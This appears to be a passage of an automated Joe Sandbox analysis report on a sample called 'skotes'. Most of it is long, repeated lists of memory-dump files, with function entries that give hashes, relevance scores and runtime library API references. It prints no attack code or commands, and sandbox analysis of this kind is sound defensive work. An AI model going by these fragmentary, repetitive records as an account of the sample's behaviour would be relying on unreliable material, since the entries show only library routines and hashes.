Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
String ID:
API String ID: 893951542-0
Opcode ID: c35dccfca8023fdd68d8bc2e28f3f7de79462d14c68e6a09f85b78094f2eaf93
Instruction ID: 3f08450925a0fd7c769b59c811b543090bb96d7a03060510e74874916bcf4e6a
Opcode Fuzzy Hash: c35dccfca8023fdd68d8bc2e28f3f7de79462d14c68e6a09f85b78094f2eaf93
Instruction Fuzzy Hash: 33311637B01610DFDF199F60C885BAD77AAAFC9710F198179E9099B395DF70AC018B90

Function 00972CFC Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00972D0F

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 60f48fd2474afe07fa76f8af03c08005dce5de9f8d785e47d5ee6687113d3f4d
Instruction ID: 8b7afd56b5b5de5b7303a25115adf68a18a052f6f5df49dce281a558959dc3aa
Opcode Fuzzy Hash: 60f48fd2474afe07fa76f8af03c08005dce5de9f8d785e47d5ee6687113d3f4d
Instruction Fuzzy Hash: CB311B76A00309DFCF24DF94C8C0BAE7BB9AF84314F1444AAD9499B386D730A945DBA1

Function 009813F5 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 009813FC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00981447
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 0098147A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 0098152A

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: 7d3951b6df2707ad395b108cb910ec0eb87d6796eded951d0538cc43693988e5
Instruction ID: de3644fdfbb0d2344868edc9e5dc6c1d8ef444d908e30e928fa041ebeda0c92f
Opcode Fuzzy Hash: 7d3951b6df2707ad395b108cb910ec0eb87d6796eded951d0538cc43693988e5
Instruction Fuzzy Hash: 13314371E006059FCF14EFA9C4916EDF7B9BF88710B14822DE426E7391DB34A941CB94

Function 0096BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0096BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0096BBE4
_xtime_get.LIBCPMT ref: 0096BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0096BC13

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 7c1bf0830cb9230d34e8c3161aa4588e778c2b890504f77d16b5ecb75eaa5c06
Instruction ID: 26f53dfc1f521262b7f466a793889ab1b2cc006758a9d7738041d41c7d6e9e8b
Opcode Fuzzy Hash: 7c1bf0830cb9230d34e8c3161aa4588e778c2b890504f77d16b5ecb75eaa5c06
Instruction Fuzzy Hash: A52141B1E00219AFDF00EFA4DD95ABEB7B9EF49710F500425F941B7261DB34AD419BA0

Function 00979C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00979C9C
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00979CE8
std::bad_exception::bad_exception.LIBCMT ref: 00979CFE
std::bad_exception::bad_exception.LIBCMT ref: 00979D6A

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
